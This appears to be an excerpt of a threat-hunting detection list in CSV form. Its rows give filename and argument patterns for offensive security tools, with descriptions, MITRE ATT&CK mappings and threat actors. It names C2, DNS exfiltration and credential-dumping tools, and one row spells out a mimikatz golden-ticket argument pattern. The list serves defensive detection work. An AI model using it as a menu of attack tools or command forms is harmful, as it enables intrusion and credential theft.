"*/dns-nsid.nse*",".{0,1000}\/dns\-nsid\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6687"
"*/DNS-Persist/*",".{0,1000}\/DNS\-Persist\/.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","6688"
"*/dnspot.git*",".{0,1000}\/dnspot\.git.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","1","N/A","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","6689"
"*/dns-random-srcport.nse*",".{0,1000}\/dns\-random\-srcport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6690"
"*/dns-random-txid.nse*",".{0,1000}\/dns\-random\-txid\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6691"
"*/dnsrecon.py*",".{0,1000}\/dnsrecon\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","6692"
"*/dnsrecon-subdomain-bruteforce.py*",".{0,1000}\/dnsrecon\-subdomain\-bruteforce\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","6693"
"*/dns-recursion.nse*",".{0,1000}\/dns\-recursion\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6694"
"*/dns-service-discovery.nse*",".{0,1000}\/dns\-service\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6695"
"*/dnsspoof.c*",".{0,1000}\/dnsspoof\.c.{0,1000}","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","#linux","N/A","N/A","3","208","47","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z","6696"
"*/dns-srv-enum.nse*",".{0,1000}\/dns\-srv\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6697"
"*/DNSStager.git*",".{0,1000}\/DNSStager\.git.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","1","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","6698"
"*/dnsstager.py*",".{0,1000}\/dnsstager\.py.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","1","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","6699"
"*/dnsteal*",".{0,1000}\/dnsteal.{0,1000}","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","N/A","N/A","10","1694","231","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z","6700"
"*/dnstool.py*",".{0,1000}\/dnstool\.py.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","6701"
"*/dns-update.nse*",".{0,1000}\/dns\-update\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6702"
"*/dns-zeustracker.nse*",".{0,1000}\/dns\-zeustracker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6703"
"*/dns-zone-transfer.nse*",".{0,1000}\/dns\-zone\-transfer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6704"
"*/dns-zone-transfer.py*",".{0,1000}\/dns\-zone\-transfer\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","6705"
"*/dobin/avred*",".{0,1000}\/dobin\/avred.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","6706"
"*/DockerPwn.py*",".{0,1000}\/DockerPwn\.py.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","1","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","6708"
"*/docker-version.nse*",".{0,1000}\/docker\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6709"
"*/DocPlz.git*",".{0,1000}\/DocPlz\.git.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","6710"
"*/DocsPLZ.cpp*",".{0,1000}\/DocsPLZ\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","6711"
"*/DocsPLZ.exe*",".{0,1000}\/DocsPLZ\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","6712"
"*/documentation-c2/*",".{0,1000}\/documentation\-c2\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","6713"
"*/documentation-payload/*",".{0,1000}\/documentation\-payload\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","6714"
"*/Do-Exfiltration.ps1*",".{0,1000}\/Do\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6715"
"*/Doge-Loader/*",".{0,1000}\/Doge\-Loader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","N/A","10","10","280","57","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z","6716"
"*/DoHC2.cs*",".{0,1000}\/DoHC2\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","6717"
"*/DoHC2.git*",".{0,1000}\/DoHC2\.git.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","6718"
"*/DoHC2/*",".{0,1000}\/DoHC2\/.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","6719"
"*/domain:* /sid:* /sids:* /rc4:* /user:* /service:krbtgt /target:*.kirbi*",".{0,1000}\/domain\:.{0,1000}\s\/sid\:.{0,1000}\s\/sids\:.{0,1000}\s\/rc4\:.{0,1000}\s\/user\:.{0,1000}\s\/service\:krbtgt\s\/target\:.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz Using domain trust key From the DC dump the hash of the currentdomain\targetdomain$ trust account using Mimikatz (e.g. with LSADump or DCSync). Then using this trust key and the domain SIDs. forge an inter-realm TGT using Mimikatz adding the SID for the target domains enterprise admins group to our SID history.","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6720"
"*/domain_analyzer.git*",".{0,1000}\/domain_analyzer\.git.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Reconnaissance","https://github.com/eldraco/domain_analyzer","1","1","N/A","N/A","6","10","1858","241","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z","6721"
"*/domain_analyzer:latest*",".{0,1000}\/domain_analyzer\:latest.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Reconnaissance","https://github.com/eldraco/domain_analyzer","1","0","N/A","N/A","6","10","1858","241","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z","6722"
"*/domainhunter*",".{0,1000}\/domainhunter.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","1","N/A","N/A","N/A","10","1587","292","2024-06-06T21:01:21Z","2017-03-01T11:16:26Z","6723"
"*/DomainPasswordSpray.git*",".{0,1000}\/DomainPasswordSpray\.git.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","6724"
"*/DomainRecon/*.txt*",".{0,1000}\/DomainRecon\/.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6725"
"*/DomainTrustRecon.ahk*",".{0,1000}\/DomainTrustRecon\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","6726"
"*/domcachedump.py*",".{0,1000}\/domcachedump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","6727"
"*/domcachedump.py*",".{0,1000}\/domcachedump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","6728"
"*/domcon-brute.nse*",".{0,1000}\/domcon\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6729"
"*/domcon-cmd.nse*",".{0,1000}\/domcon\-cmd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6730"
"*/Dome.git*",".{0,1000}\/Dome\.git.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","6","531","74","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z","6731"
"*/domino-enum-users.nse*",".{0,1000}\/domino\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6732"
"*/dompdf-rce*",".{0,1000}\/dompdf\-rce.{0,1000}","offensive_tool_keyword","POC","This repository contains a vulnerable demo application using dompdf 1.2.0 and an exploit that achieves remote code execution via a ttf+php polyglot file.","T1203 - T1204","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/positive-security/dompdf-rce","1","1","N/A","N/A","N/A","2","176","66","2022-03-17T18:05:07Z","2022-03-14T19:51:06Z","6733"
"*/DonPAPI.git*",".{0,1000}\/DonPAPI\.git.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","6734"
"*/DonPAPI.py*",".{0,1000}\/DonPAPI\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","6735"
"*/DonPAPI.zip*",".{0,1000}\/DonPAPI\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","6736"
"*/donut *.exe*",".{0,1000}\/donut\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","#linux","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","6737"
"*/donut.exe*",".{0,1000}\/donut\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","6738"
